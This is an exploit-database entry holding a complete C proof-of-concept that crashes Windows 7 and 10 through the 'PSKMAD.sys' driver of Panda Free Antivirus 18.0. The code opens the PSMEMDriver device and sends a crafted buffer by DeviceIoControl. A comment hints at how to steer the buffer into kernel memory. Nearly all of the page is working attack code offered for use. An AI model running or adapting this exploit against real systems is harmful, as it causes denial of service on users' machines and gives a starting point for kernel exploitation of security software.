Panda Free Antivirus - 'PSKMAD.sys' Denial of Service



EKU-ID: 6557 CVE: OSVDB-ID:
Author: Peter Baris Published: 2017-05-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
 
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
 
 
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
 
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
    HANDLE hFile = NULL;
 
    hFile = CreateFile(FileName,
        GENERIC_READ | GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        NULL,
        0);
 
    return hFile;
}
 
int main()
{
 
    HANDLE hFile = NULL;
    PVOID64 lpInBuffer = NULL;
    ULONG64 lpBytesReturned;
    PVOID64 BuffAddress = NULL;
    SIZE_T BufferSize = 0x800;
    
    printf("Trying the get the handle for the PSMEMDriver device.\r\n");
    
    hFile = GetDeviceHandle(FileName);
 
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
        return 1;
    }
 
    // Allocate memory for our buffer
    lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    
 
    if (lpInBuffer == NULL) {
        printf("VirtualAlloc() failed. \r\n");
        return 1;
    }
    
 
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
    *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
    *(PULONG64)BuffAddress = (ULONG64)0x42424242;
    BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
    
    RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
 
 
 
        DeviceIoControl(hFile,
            0xb3702c38,
            lpInBuffer,
            NULL,  //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
            NULL,
            NULL,
            &lpBytesReturned,
            NULL);
 
    /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
    printf("Cleaning up.\r\n");
    VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
    CloseHandle(hFile);
    printf("Resources freed up.\r\n");
    return 0;
}